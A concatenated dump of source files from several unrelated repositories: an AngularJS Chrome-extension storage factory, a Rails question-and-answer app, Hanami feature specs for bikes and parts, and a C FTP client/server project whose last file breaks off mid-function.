* An object to broadcast to the rootScope.
* - apply: (bool) true to instruct watchers that they should manually
* resync with $scope.$apply(). This may need to be done if the
* broadcast was originally triggered by chrome.storage methods. This
* is probably a hack; a better solution exists somewhere.
*
* @return void
*/
pvt.broadcastUpdate = function(data) {
if (typeof(data) == 'undefined') {
data = { apply: false };
}
$rootScope.$broadcast('listsUpdate', data);
};
/**
* Set data object to a new value.
*
* This will trigger a broadcast update.
*
* @param object data
* see cleanData() for object details.
* @param object broadcastData
* see broadcastUpdate() for object details.
*
* @return object
* An object (result) with properties:
* - success: (bool) true on success, false on failure.
* - message: (string) if success is false then this will be set to
* the last issue found when validating data object.
*/
pvt.setData = function(data, broadcastData) {
// Make sure the data object is constructed properly.
var result = this.cleanData(data);
if (result.success) {
this.data = result.data;
this.broadcastUpdate(broadcastData);
}
return result;
};
/**
* Save data object to chrome storage.
*
* @param function callback
* Callback will be invoked when saving is finished.
*
* @return object
* An object (result) with properties:
* - success: (bool) true on success, false on failure.
* - message: (string) will be set on failure.
*/
pvt.save = function(callback) {
// Remove angular hashes but store result as an object.
var data = JSON.parse(angular.toJson(this.data));
data.lastSave = new Date().getTime();
chrome.storage.sync.set( { 'lists': data } , function() {
if (typeof(callback) != 'undefined') {
if (chrome.runtime.lastError) {
callback({ success: 0, message: chrome.runtime.lastError.message });
} else {
callback({ success: 1, message: null });
}
}
});
};
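  // Usage sketch for save(): persist the current data object and report
  // any chrome storage failure (callback shape as documented above).
  //
  // pvt.save(function(result) {
  //   if (!result.success) console.log('Save failed: ' + result.message);
  // });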
/**
* Reset data object to the default json object file, save results to
* storage.
*
* @param function callback
* Callback will be invoked when saving is finished.
* @param object resetData
* (optional) If provided then this object will be used to reset against
* instead of reading from the default json object file.
*
* @return void
* Callback is invoked when operation is finished with arguments:
* - result: (object) An object with properties:
* - success: (bool) true on success, false on failure.
* - message: (string) will be set on failure.
*/
pvt.reset = function(callback, resetData) {
    var parent = this;
$.get(chrome.extension.getURL('data/lists.json'), {}, function(data) {
if (typeof(resetData) != 'undefined')
data = resetData;
resetData = parent.cleanData(JSON.parse(data)).data;
var result = parent.setData(resetData, { apply: true } );
      if (result.success) {
        parent.save(function(result) {
          callback(result);
        });
      } else {
        callback(result);
      }
    });
  };
/**
* Check for any remote updates to the data object and apply if found.
*
* Retrieves the update data object and updates the current.
*
* @return void
*/
pvt.update = function() {
var time = new Date().getTime();
if (time > (this.data.lastUpdate + (24 * 60 * 60 * 1000))) {
var parent = this;
$.get(chrome.extension.getURL('data/lists.json'), {}, function(data) {
if (typeof(data) != 'undefined') {
var currentData = parent.getData();
var updateData = parent.cleanData(JSON.parse(data)).data;
// Preserve custom settings.
updateData.useDefault = currentData.useDefault;
updateData.items.custom = currentData.items.custom;
updateData.lastUpdate = time;
var result = parent.setData(updateData, { apply: true } );
if (result.success) {
parent.save(function(result) {
if (result.success) {
console.log('Lists have been updated.');
} else {
                console.log('Lists requires update but has failed to save!');
}
});
} else {
console.log('Lists requires update but could not merge objects.');
}
}
});
}
};
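  // Usage note (inferred from the code above): update() is rate-limited to
  // once per 24 hours via the lastUpdate timestamp, so with lastUpdate == 0
  // the first call after factory load always refreshes:
  //
  // if (pvt.data.autoUpdate) pvt.update();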
// Load an empty (but valid) data object by default.
pvt.data = pvt.cleanData().data;
/**
* Public api.
*/
var api = {};
api.setData = function(data, broadcastData) {
return pvt.setData(data, broadcastData);
};
api.cleanData = function() {
return pvt.cleanData();
};
api.getData = function() {
return pvt.getData();
};
api.addItem = function(item) {
return pvt.addItem(item, pvt.data.items.custom, true);
};
api.removeItem = function(index) {
return pvt.removeItem(index, pvt.data.items.custom, true);
};
api.save = function(callback) {
return pvt.save(callback);
};
api.reset = function(callback, resetData) {
return pvt.reset(callback, resetData);
};
api.compareItem = function(item, itemList) {
return pvt.compareItem(item, itemList);
}
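  // Usage sketch of the public api from a hypothetical controller. The
  // module/controller names and the item fields are assumptions, not part
  // of this file; the 'listsUpdate' event and the result shapes are
  // documented above.
  //
  // app.controller('ListsCtrl', ['$scope', 'lists', function($scope, lists) {
  //   $scope.$on('listsUpdate', function(event, data) {
  //     $scope.lists = lists.getData();
  //   });
  //   var result = lists.addItem({ regex: '[A-Z]' });
  //   if (!result.success) console.log(result.message);
  // }]);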
// When factory is first instantiated pull the data object out of
// chrome storage. This will result in a broadcast update.
chrome.storage.sync.get(['lists'], function(result) {
if (chrome.runtime.lastError) {
      console.log('Could not load lists object from chrome storage: ' + chrome.runtime.lastError.message);
} else {
// Clean the data, ignore any warnings (offenders removed).
var data = pvt.cleanData(result['lists']).data;
var result = api.setData(data, { apply: true } );
if (!result.success) {
console.log('Could not apply lists from chrome storage: ' + result.message);
console.log(data);
} else {
if (data.autoUpdate) pvt.update();
}
}
});
// Listen for any updates to the data object in chrome storage. This
// should only happen if multiple browsers are open, or if extension code
// on the other side of the javascript firewall (popup versus options
// versus content) has written a change to storage. This will result in a
// broadcast update.
chrome.storage.onChanged.addListener(function(object, namespace) {
    for (var key in object) {
if (key == 'lists') {
// Clean the object, ignore any warnings (offenders removed).
        var data = pvt.cleanData(object.lists.newValue).data;
var result = api.setData(data, { apply: true } );
if (!result.success) {
console.log('Could not apply lists from chrome storage: ' + result.message);
console.log(data);
}
}
}
});
return api;
}]);
|
90b62f7aa8a683ab052eded1a6e37a49c4135363
|
[
"JavaScript",
"Markdown",
"Shell"
] | 17
|
JavaScript
|
BrettBiba/chrome-stock-ticker
|
8aafbe04ac80ea0932bc17b4fdc4f4f2d065370c
|
3489c8118377786ad460239c809a35ea71eb6325
|
refs/heads/master
|
<file_sep>class QuestionandanswersController < ApplicationController
def new
@qanda = Questionandanswer.new
end
def create
@qanda = Questionandanswer.new(qanda_params)
if @qanda.save
flash[:notice] = "Question Saved Successfully"
if params[:questionandanswer][:more] == '1'
        redirect_to :action => 'new', :qurl => @qanda.question_url
else
redirect_to root_url
end
else
render :new
end
end
def index
@qanda = Questionandanswer.all
end
def show
@qanda = Questionandanswer.where(:question_url => params[:question_url])
end
private
def qanda_params
params.require(:questionandanswer).permit(:question_url,:question,:answer,:opt1,:opt2,:opt3,:opt4,:explanation,:more)
end
end
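# Routes sketch these actions appear to assume (hypothetical; the real
# config/routes.rb is not included in this dump):
#
#   resources :questionandanswers, :only => [:new, :create, :index]
#   get ':question_url' => 'questionandanswers#show'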
<file_sep>class Questionandanswer < ActiveRecord::Base
attr_accessor :more
end
<file_sep>class AddQuestionUrlQuestionAnswerOpt1Opt2Opt3Opt4ExplanationToQuestionandanswers < ActiveRecord::Migration
def change
add_column :questionandanswers, :question_url, :string
add_column :questionandanswers, :question, :string
add_column :questionandanswers, :answer, :string
add_column :questionandanswers, :opt1, :string
add_column :questionandanswers, :opt2, :string
add_column :questionandanswers, :opt3, :string
add_column :questionandanswers, :opt4, :string
add_column :questionandanswers, :explanation, :string
end
end
|
031ca9f6530a2e305653a4795cab6a52f2e3eb29
|
[
"Ruby"
] | 3
|
Ruby
|
owaiswiz/QandA
|
a3262095c138357d1e069d968a7b410e0a498f22
|
1d66f7a8490de67080289f5ca18dd20c60d35fb4
|
refs/heads/master
|
<file_sep>t2 = q0*q0;
t3 = q1*q1;
t4 = q2*q2;
t5 = q3*q3;
t6 = q0*q2*2.0;
t7 = q1*q3*2.0;
t8 = t6+t7;
t9 = q0*q3*2.0;
t13 = q1*q2*2.0;
t10 = t9-t13;
t11 = t2+t3-t4-t5;
t12 = magX*t11;
t14 = magZ*t8;
t19 = magY*t10;
t15 = t12+t14-t19;
t16 = t2-t3+t4-t5;
t17 = q0*q1*2.0;
t24 = q2*q3*2.0;
t18 = t17-t24;
t20 = 1.0/t15;
t21 = magY*t16;
t22 = t9+t13;
t23 = magX*t22;
t28 = magZ*t18;
t25 = t21+t23-t28;
t29 = t20*t25;
t26 = tan(t29);
t27 = 1.0/(t15*t15);
t30 = t26*t26;
t31 = t30+1.0;
H_MAG[0] = -t31*(t20*(magZ*t16+magY*t18)+t25*t27*(magY*t8+magZ*t10));
H_MAG[1] = t31*(t20*(magX*t18+magZ*t22)+t25*t27*(magX*t8-magZ*t11));
H_MAG[2] = t31*(t20*(magX*t16-magY*t22)+t25*t27*(magX*t10+magY*t11));
H_MAG[19] = t31*(t20*t22-t11*t25*t27);
H_MAG[20] = t31*(t16*t20+t10*t25*t27);
H_MAG[21] = -t31*(t18*t20+t8*t25*t27);
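/* The expressions above populate entries of the magnetometer observation
** Jacobian H_MAG from the quaternion states (q0..q3) and the body-frame
** field measurements (magX, magY, magZ). The t* temporaries look
** machine-generated from a symbolic derivation; that reading is an
** inference from the code, not documented behaviour. */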
|
52d49d7294bbd9b1212eef4f2f40f0757ddfda84
|
[
"C"
] | 1
|
C
|
Yvaine/InertialNav
|
e657e3d83e5da1fa6c95daa4e849a74d3baee683
|
2934d51a043e57ebec539f328ff6e0f6c7c961bd
|
refs/heads/master
|
<file_sep>require 'features_helper'
RSpec.describe 'Edit a bike part' do
let(:repositories) do
{
bikes: BikeRepository.new,
part_types: PartTypeRepository.new,
parts: PartRepository.new
}
end
before do
repositories.each(&:clear)
@bike = repositories[:bikes].create(name: 'Bike name')
@rear_tire_type = repositories[:part_types].create(name: 'Rear tire')
@front_tire_type = repositories[:part_types].create(name: 'Front tire')
@part = repositories[:bikes].add_part(@bike, name: 'Part name', type_id: @rear_tire_type.id)
end
it 'can edit an existent bike part' do
visit "/bikes/#{@bike.id}/parts/#{@part.id}/edit"
within 'form#part-form' do
fill_in 'Name', with: '<NAME>'
select @front_tire_type.name, from: 'Type id'
click_button 'Update'
end
expect(current_path).to eq("/bikes/#{@bike.id}/parts")
expect(page).to_not have_content('Part name')
expect(page).to have_content('New name')
end
end
<file_sep>require 'features_helper'
RSpec.describe 'Add a bike part' do
let(:repositories) do
{
bikes: BikeRepository.new,
part_types: PartTypeRepository.new,
parts: PartRepository.new
}
end
before do
repositories.each(&:clear)
@bike = repositories[:bikes].create(name: 'Bike name')
@part_type = repositories[:part_types].create(name: 'Front tire')
end
it 'can create a new bike part' do
visit "/bikes/#{@bike.id}/parts/new"
within 'form#part-form' do
fill_in 'Name', with: 'New bike part'
select 'Front tire', from: 'Type id'
click_button 'Create'
end
expect(current_path).to eq("/bikes/#{@bike.id}/parts")
expect(page).to have_content('New bike part')
end
end
<file_sep>require 'features_helper'
RSpec.describe 'Edit a bike' do
let(:repository) { BikeRepository.new }
before do
repository.clear
@bike = repository.create(name: 'name #1')
end
it 'can edit an existent bike' do
visit "/bikes/#{@bike.id}/edit"
within 'form#bike-form' do
fill_in 'Name', with: '<NAME>'
select 'Road Bike', from: 'Type'
click_button 'Update'
end
expect(current_path).to eq('/bikes')
expect(page).to_not have_content('name #1')
expect(page).to have_content('New name')
end
end
<file_sep>require 'features_helper'
describe 'List bike parts' do
let(:repositories) do
{
bikes: BikeRepository.new,
part_types: PartTypeRepository.new,
parts: PartRepository.new
}
end
before do
repositories.each(&:clear)
@bike = repositories[:bikes].create(name: 'Bike name')
@rear_tire_type = repositories[:part_types].create(name: 'Rear tire')
@front_tire_type = repositories[:part_types].create(name: 'Front tire')
end
  it 'shows a message when no bike parts exist' do
visit "/bikes/#{@bike.id}/parts"
expect(page).to have_content("There aren't parts yet")
end
it 'shows all bikes on page' do
repositories[:bikes].add_part(@bike, name: 'Part name #1', type_id: @rear_tire_type.id)
repositories[:bikes].add_part(@bike, name: 'Part name #2', type_id: @front_tire_type.id)
visit "/bikes/#{@bike.id}/parts"
within '#parts' do
expect(page).to have_css('.part', count: 2)
expect(page).to have_content('Part name #1')
expect(page).to have_content('Part name #2')
end
end
end
<file_sep>require 'features_helper'
describe 'List bikes' do
let(:repository) { BikeRepository.new }
before do
repository.clear
end
  it 'shows a message when no bikes exist' do
visit '/bikes'
expect(page).to have_content("There aren't bikes yet")
end
it 'shows all bikes on page' do
repository.create(name: 'name #1')
repository.create(name: 'name #2')
visit '/bikes'
within '#bikes' do
expect(page).to have_css('.bike', count: 2)
end
end
end
<file_sep>require 'features_helper'
RSpec.describe 'Add a bike' do
after do
BikeRepository.new.clear
end
it 'can create a new bike' do
visit '/bikes/new'
within 'form#bike-form' do
fill_in 'Name', with: '<NAME>'
select 'Road Bike', from: 'Type'
click_button 'Create'
end
expect(current_path).to eq('/bikes')
expect(page).to have_content('New bike')
end
end
<file_sep>class UserRepository < Hanami::Repository
def find_by_provider_and_uid(provider, uid)
users.where(provider: provider, uid: uid).first
end
end
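# Usage sketch (the provider and uid values are placeholders):
#
#   UserRepository.new.find_by_provider_and_uid('github', '12345') # => user or nil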
<file_sep>RSpec.describe UserRepository do
it '#find_by_provider_and_uid'
end
<file_sep>RSpec.describe BikeRepository do
context 'associations' do
it 'parts'
end
it '#add_part'
end
|
31551dfc93f575e2b39a52f1708cf3d2a1340e63
|
[
"Ruby"
] | 9
|
Ruby
|
pazjacket/vyper-_-upkeep
|
c0d3b8d9dfd4812b23a004211879481cf3eb2203
|
e61571dd6e0f78e9e6a26e2683067a2dbd1bdba4
|
refs/heads/main
|
<repo_name>Jay-Sharma18/HackerRank-Problem-Solving-Algorithm-Lisa-s-WorkBook<file_sep>/README.md
# HackerRank-Problem-Solving-Algorithm-Lisa-s-WorkBook
Find special problems in the book (special problems are problems in each chapter that have the same number as the page they are on).
<file_sep>/LisasWorkBook.java
package JavaAlgorithms;
import java.io.*;
import java.math.*;
import java.security.*;
import java.text.*;
import java.util.*;
import java.util.concurrent.*;
import java.util.regex.*;
public class LisasWorkBook {
// Complete the workbook function below.
static int workbook(int n, int k, int[] arr) {
        //variable to hold current page number as we move through page by page.
        //This variable will be used for comparison with question number to find
        //special questions
int currentPage=0;
//variable to hold count of special questions
int count=0;
//run the loop for each chapter
for(int i=0;i<n;i++)
{
            //if questions in a chapter are less than or equal to questions allowed on a
            //page, increment page number and run a loop from 1 to questions in the
            //chapter and increment counter when a special question is encountered
if(arr[i]<=k)
{
currentPage++;
for(int j=1;j<=arr[i];j++)
{
if(j==currentPage)
{
count++;
}
}
}
            //if questions in a chapter are greater than questions allowed on a page,
            //increment current page each time the number of questions in the chapter
            //exceeds questions allowed on the page and check for special questions. Do
            //not increment current page if the last question falls on it
else
{
currentPage+=1;
int temp=0;
for(int j=1;j<=arr[i];j++)
{
temp++;
if(j==currentPage) count++;
if(temp==k && j!=arr[i])
{
currentPage+=1;
temp=0;
}
}
}
}
return count;
}
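    // Worked example (values assumed from the published HackerRank sample):
    // with n = 5, k = 3, arr = {4, 2, 6, 1, 10}, pages 1, 4, 5 and 9 each
    // contain a question whose number equals the page number, so
    // workbook(5, 3, new int[]{4, 2, 6, 1, 10}) returns 4.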
private static final Scanner scanner = new Scanner(System.in);
public static void main(String[] args) throws IOException {
BufferedWriter bufferedWriter = new BufferedWriter(new FileWriter("C:\\Users\\Jay\\Desktop\\Selenium,Drivers and Cucumber\\test.txt"));
String[] nk = scanner.nextLine().split(" ");
int n = Integer.parseInt(nk[0]);
int k = Integer.parseInt(nk[1]);
int[] arr = new int[n];
String[] arrItems = scanner.nextLine().split(" ");
scanner.skip("(\r\n|[\n\r\u2028\u2029\u0085])?");
for (int i = 0; i < n; i++) {
int arrItem = Integer.parseInt(arrItems[i]);
arr[i] = arrItem;
}
int result = workbook(n, k, arr);
bufferedWriter.write(String.valueOf(result));
bufferedWriter.newLine();
bufferedWriter.close();
scanner.close();
}
}
|
ac0f6bb02836de733747b91db1229cb4df2aa11d
|
[
"Markdown",
"Java"
] | 2
|
Markdown
|
Jay-Sharma18/HackerRank-Problem-Solving-Algorithm-Lisa-s-WorkBook
|
575b73d2407e1366dc5dfc43bab55fe63dbad3da
|
4224803fcd9dc5c6c46b282438e8432b3ddec751
|
refs/heads/master
|
<repo_name>Lumpouille/FTP<file_sep>/src/features_cd.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* features_cd.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: mceccato <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2015/03/18 18:22:15 by mceccato #+# #+# */
/* Updated: 2015/03/30 17:50:56 by mceccato ### ########.fr */
/* */
/* ************************************************************************** */
#include "ftp.h"
char **ft_pwd(char *cwd, char **envy)
{
int i;
char *s;
char *tmp;
i = 0;
while (envy[i] != NULL)
{
if ((ft_strncmp(envy[i], "PWD", 3)) == 0)
{
s = ft_strjoin("PWD=", cwd);
free(envy[i]);
envy[i] = ft_strdup(s);
free(s);
return (envy);
}
i++;
}
tmp = ft_strjoin("PWD=", cwd);
envy = ft_set_env(envy, tmp);
free(tmp);
return (envy);
}
char **ft_oldpwd(char *cwd, char **envy)
{
int i;
char *s;
char *tmp;
i = 0;
while (envy[i] != NULL)
{
if ((ft_strncmp(envy[i], "OLDPWD", 6)) == 0)
{
s = ft_strjoin("OLDPWD=", cwd);
free(envy[i]);
envy[i] = ft_strdup(s);
free(s);
return (envy);
}
i++;
}
tmp = ft_strjoin("OLDPWD=", cwd);
envy = ft_set_env(envy, tmp);
free(tmp);
return (envy);
}
char *ft_get_home(char **envy)
{
char *s;
char **tmp;
int i;
i = 0;
while (envy[i] != NULL)
{
if (ft_strncmp(envy[i], "HOME=", 5) == 0)
{
tmp = ft_strsplit(envy[i], '=');
s = ft_strdup(tmp[1]);
free_arr2d(tmp);
return (s);
}
i++;
}
return (NULL);
}
char *ft_cd_oldpwd(char **envy)
{
char *s;
int i;
i = 0;
while (envy[i] != NULL)
{
if ((ft_strncmp(envy[i], "OLDPWD=", 7)) == 0)
{
s = ft_strsub(envy[i], 7, ft_strlen(envy[i]) - 7);
return (s);
}
i++;
}
return (NULL);
}
void ft_error_cd(char *s, char *dir)
{
struct stat sb;
if (lstat(dir, &sb) == -1)
{
ft_putstr("cd: no such file or directory: ");
(dir) ? ft_putendl(dir) : ft_putendl(s);
return ;
}
else
{
		if (S_ISDIR(sb.st_mode))
		{
			if (!(sb.st_mode & S_IXUSR))
{
ft_putstr("cd: permission denied: ");
ft_putendl(dir);
return ;
}
}
ft_putstr("cd: not a directory: ");
ft_putendl(dir);
return ;
}
}
<file_sep>/src/serveur.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* serveur.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: mceccato <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2015/05/08 16:47:27 by mceccato #+# #+# */
/* Updated: 2015/07/01 18:50:58 by mceccato ### ########.fr */
/* */
/* ************************************************************************** */
#include "ftp.h"
void end_client(int save, t_server *serv)
{
dup2(save, 1);
close(save);
if (serv->ret == 0)
ft_putendl("Client disconnected.");
else if (serv->ret == -1)
ft_putendl("Error, recv failed.");
}
void state(t_server *serv)
{
char buff[3001];
ft_bzero(buff, 3001);
if (serv->state == KO)
{
send(serv->cs, ERROR, ft_strlen(ERROR) + 1, 0);
recv(serv->cs, buff, 300, 0);
}
else if (serv->state == OK)
{
send(serv->cs, SUCCESS, ft_strlen(SUCCESS) + 1, 0);
recv(serv->cs, buff, 300, 0);
}
}
void new_client(t_server *serv)
{
pid_t pid;
char buff[3001];
int save;
save = dup(1);
if ((pid = fork()) == 0)
{
ft_bzero(buff, 3001);
while ((serv->ret = read(serv->cs, buff, 3000)) > 0)
{
serv->state = KO;
dup2(serv->cs, 1);
dup2(serv->cs, 2);
buff[serv->ret - 1] = '\0';
change_tab(buff);
serv->split_line = ft_strsplit(buff, ' ');
read_commands(serv);
state(serv);
ft_bzero(buff, 3001);
}
end_client(save, serv);
		close(serv->cs);
		exit(OK);
	}
}
char **get_env(char **env)
{
char **arr;
int i;
int j;
i = 0;
j = 0;
while (env[i] != NULL)
i++;
if (!(arr = (char**)malloc(sizeof(char*) * (i + 1))))
return (NULL);
while (j < i)
{
arr[j] = ft_strdup(env[j]);
j++;
}
arr[j] = NULL;
return (arr);
}
int main(int ac, char **av, char **env)
{
t_server serv;
if (ac != 2)
usage(av[0]);
serv.envy = get_env(env);
serv.port = ft_atoi(av[1]);
serv.sock = create_server(serv.port);
while ((serv.cs = accept(serv.sock,
(struct sockaddr*)&serv.csin, &serv.cslen)) > 0)
{
ft_putendl("Client connected.");
new_client(&serv);
}
close(serv.sock);
return (0);
}
<file_sep>/libft/Makefile
# **************************************************************************** #
# #
# ::: :::::::: #
# Makefile :+: :+: :+: #
# +:+ +:+ +:+ #
# By: mceccato <<EMAIL>> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2014/11/13 18:50:34 by mceccato #+# #+# #
# Updated: 2015/01/30 18:32:52 by mceccato ### ########.fr #
# #
# **************************************************************************** #
NAME = libft.a
SRC = ft_bzero.c ft_memset.c ft_memcpy.c ft_memccpy.c ft_memmove.c \
ft_memchr.c ft_memcmp.c ft_memalloc.c ft_memdel.c \
ft_strnew.c ft_strdel.c ft_strclr.c ft_atoi.c \
ft_strdup.c ft_strlen.c ft_strcpy.c ft_strncpy.c \
ft_strcat.c ft_strncat.c ft_strlcat.c ft_strchr.c \
ft_strrchr.c ft_strstr.c ft_strncmp.c ft_strnstr.c \
ft_strcmp.c ft_strjoin.c ft_putendl_fd.c ft_itoa.c \
ft_strtrim.c ft_striter.c ft_strmap.c ft_strsplit.c \
ft_striteri.c ft_strmapi.c ft_strequ.c ft_strnequ.c \
ft_strsub.c ft_tolower.c ft_toupper.c ft_isprint.c \
ft_isascii.c ft_isdigit.c ft_isalnum.c ft_isalpha.c \
ft_putchar.c ft_putchar_fd.c ft_putstr.c \
ft_putstr_fd.c ft_putnbr.c ft_putnbr_fd.c ft_putendl.c \
ft_putendl_fd.c ft_lstnew.c ft_lstdelone.c ft_lstdel.c \
ft_lstadd.c ft_lstiter.c ft_lstmap.c ft_lstpush.c ft_isspace.c \
ft_strclen.c ft_strpure.c ft_swap.c
OBJ = $(SRC:.c=.o)
CC = gcc
CCFLAGS = -Wall -Werror -Wextra
all: $(NAME)
$(NAME): $(OBJ)
@ar rc $(NAME) $^
@ranlib $(NAME)
%.o: %.c
@$(CC) $(CCFLAGS) -o $@ -c $< -I includes
clean:
@/bin/rm -f $(OBJ)
fclean: clean
@/bin/rm -f $(NAME)
re: fclean all
.PHONY: all clean fclean re
<file_sep>/Makefile
# **************************************************************************** #
# #
# ::: :::::::: #
# Makefile :+: :+: :+: #
# +:+ +:+ +:+ #
# By: mceccato <<EMAIL>> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2015/05/08 16:46:50 by mceccato #+# #+# #
# Updated: 2015/07/02 16:05:05 by mceccato ### ########.fr #
# #
# **************************************************************************** #
SRC_CLIENT = src/client.c \
src/client_suite.c \
src/put_file.c
OBJS_CLIENT = $(SRC_CLIENT:.c=.o)
SRC_SERV = src/serveur.c \
src/serveur_suite.c \
src/exec.c \
src/cd.c \
src/features_cd.c \
src/set_env.c \
src/unset_env.c \
src/transfer.c
OBJS_SERV = $(SRC_SERV:.c=.o)
CC = clang
CCFLAGS = -Wall -Wextra -Werror
INC = -I libft/ -I inc
LIB = -L libft -lft
all: serveur client
libft/libft.a:
make -C libft/
serveur: libft/libft.a $(OBJS_SERV)
@$(CC) $(CCFLAGS) $(OBJS_SERV) -o $@ $(INC) $(LIB)
client: libft/libft.a $(OBJS_CLIENT)
@$(CC) $(CCFLAGS) $(OBJS_CLIENT) -o $@ $(INC) $(LIB)
%.o: %.c
$(CC) $(CCFLAGS) $(INC) -c $< -o $@
clean:
/bin/rm -f $(OBJS_SERV)
/bin/rm -f $(OBJS_CLIENT)
make -C libft clean
fclean: clean
/bin/rm -f serveur
/bin/rm -f client
make -C libft fclean
re: fclean all
.PHONY: all clean fclean re serveur client libft/libft.a
<file_sep>/src/unset_env.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* unset_env.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: mceccato <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2015/03/30 20:44:26 by mceccato #+# #+# */
/* Updated: 2015/03/31 10:06:43 by mceccato ### ########.fr */
/* */
/* ************************************************************************** */
#include "ftp.h"
char **ft_unset(char **new, char **envy, char *line)
{
int i;
int k;
char *tmp;
i = 0;
k = 0;
while (envy[i] != NULL)
{
tmp = ft_strsub(envy[i], 0, ft_strclen(envy[i], '='));
if ((ft_strcmp(line, tmp)) == 0)
i++;
else
{
new[k] = ft_strdup(envy[i]);
k++;
i++;
}
free(tmp);
tmp = NULL;
}
new[k] = NULL;
free_arr2d(envy);
return (new);
}
char **ft_unset_env(char **envy, char *line)
{
int i;
int ret;
char *tmp;
char **new;
ret = -1;
i = 0;
if (!line)
return (envy);
while (envy[i] != NULL)
{
tmp = ft_strsub(envy[i], 0, ft_strclen(envy[i], '='));
if ((ft_strcmp(line, tmp)) == 0)
ret = 0;
i++;
free(tmp);
tmp = NULL;
}
if (ret != 0)
return (envy);
if (!(new = (char**)malloc(sizeof(char*) * i)))
exit(EXIT_FAILURE);
new = ft_unset(new, envy, line);
return (new);
}
<file_sep>/src/put_file.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* put_file.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: mceccato <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2015/06/30 23:42:38 by mceccato #+# #+# */
/* Updated: 2015/07/01 16:15:00 by mceccato ### ########.fr */
/* */
/* ************************************************************************** */
#include "ftp.h"
/*
** sending the file -------- CLIENT -----------
*/
void send_file(t_client *client, int fd)
{
char file[3000];
char rec[3000];
while ((client->ret = read(fd, file, 3000)) > 0)
{
recv(client->sock, rec, 3000, 0);
		send(client->sock, ft_itoa(client->ret), 4, 0);
if (client->ret != 0)
{
recv(client->sock, rec, 3000, 0);
send(client->sock, file, client->ret, 0);
ft_bzero(file, 3000);
}
}
recv(client->sock, rec, 3000, 0);
	send(client->sock, ft_itoa(client->ret), 4, 0);
}
void send_back(t_client *client)
{
int fd;
char buf[3000];
recv(client->sock, buf, 3000, 0);
if (!client->split_line[1])
{
send(client->sock, "ko", 2, 0);
ft_putendl("Usage: put <file>");
return ;
}
if ((fd = open(client->split_line[1], O_RDONLY)) == -1)
{
send(client->sock, "ko", 2, 0);
ft_putendl("File not found");
close(fd);
return ;
}
send(client->sock, "ok", 2, 0);
send_file(client, fd);
close(fd);
}
void my_put(t_client client)
{
char reply[30001];
send(client.sock, "put", 3, 0);
send_back(&client);
recv(client.sock, reply, 30000, 0);
send(client.sock, "ty", 2, 0);
ft_putstr(reply);
}
<file_sep>/src/client_suite.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* client_suite.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: mceccato <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2015/07/01 16:07:05 by mceccato #+# #+# */
/* Updated: 2015/07/01 16:08:24 by mceccato ### ########.fr */
/* */
/* ************************************************************************** */
#include "ftp.h"
void kill_process(int i)
{
	(void)i;
	exit(KO);
}
void usage(char *s)
{
ft_putstr("Usage: ");
ft_putstr(s);
ft_putstr(" <addr>");
ft_putendl(" <port>");
exit(KO);
}
int create_client(char *addr, int port)
{
int sock;
struct protoent *proto;
struct sockaddr_in sin;
proto = getprotobyname("tcp");
if (proto == 0)
return (KO);
sock = socket(PF_INET, SOCK_STREAM, proto->p_proto);
sin.sin_family = AF_INET;
sin.sin_port = htons(port);
sin.sin_addr.s_addr = inet_addr(addr);
if (connect(sock, (const struct sockaddr *)&sin, sizeof(sin)) == -1)
{
ft_putendl_fd("Connect error", 2);
exit(KO);
}
ft_putstr("Connected on : ");
ft_putendl(addr);
return (sock);
}
void change_tab(char *line)
{
int i;
i = 0;
while (line[i] != '\0')
{
if (line[i] == '\t' || line[i] == '\n')
line[i] = ' ';
i++;
}
}
void free_arr2d(char **arr)
{
int i;
i = -1;
while (arr[++i] != NULL)
{
free(arr[i]);
arr[i] = NULL;
}
free(arr);
arr = NULL;
}
<file_sep>/src/cd.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* cd.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: mceccato <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2015/06/11 16:05:03 by mceccato #+# #+# */
/* Updated: 2015/06/11 16:05:05 by mceccato ### ########.fr */
/* */
/* ************************************************************************** */
#include "ftp.h"
char **ft_end_cd(char *dir, char *s, char *cwd, char **envy)
{
int chret;
char *tmp;
if ((chret = chdir(s) == -1))
{
if (dir && dir[0] == '~')
ft_error_cd(dir, s);
else
ft_error_cd(dir, s);
return (envy);
}
if ((tmp = getcwd(NULL, 0)) == NULL)
return (envy);
envy = ft_oldpwd(cwd, envy);
envy = ft_pwd(tmp, envy);
free(tmp);
free(cwd);
tmp = NULL;
free(s);
s = NULL;
return (envy);
}
char *ft_no_dir(char **envy)
{
char *s;
if ((s = ft_get_home(envy)) == NULL)
{
ft_putendl_fd("ft_minishell1: cd: HOME not set", 2);
return (NULL);
}
return (s);
}
char *ft_cd_home(char *dir, char **envy)
{
char *tmp;
char *s;
if ((tmp = ft_get_home(envy)) == NULL)
return (NULL);
if (dir[1] == '\0')
s = ft_strdup(tmp);
else
s = ft_strjoin(tmp, ft_strsub(dir, 1, ft_strlen(dir) - 1));
return (s);
}
char *ft_else(char *cwd, char *dir, char **envy)
{
char *s;
char *tmp;
tmp = NULL;
if (dir[0] == '-')
s = ft_cd_oldpwd(envy);
else
{
tmp = ft_strjoin(cwd, "/");
s = ft_strjoin(tmp, dir);
free(tmp);
tmp = NULL;
}
return (s);
}
char **ft_cd(char *dir, char **envy)
{
char *s;
char *cwd;
if ((cwd = getcwd(NULL, 0)) == NULL)
return (envy);
